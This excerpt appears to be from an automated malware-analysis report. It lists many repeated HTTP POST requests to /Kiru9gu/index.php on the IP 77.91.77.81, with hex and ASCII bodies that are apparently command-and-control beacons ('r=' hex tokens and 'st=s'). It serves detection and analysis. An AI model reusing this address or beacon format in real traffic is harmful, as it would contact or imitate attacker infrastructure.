                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
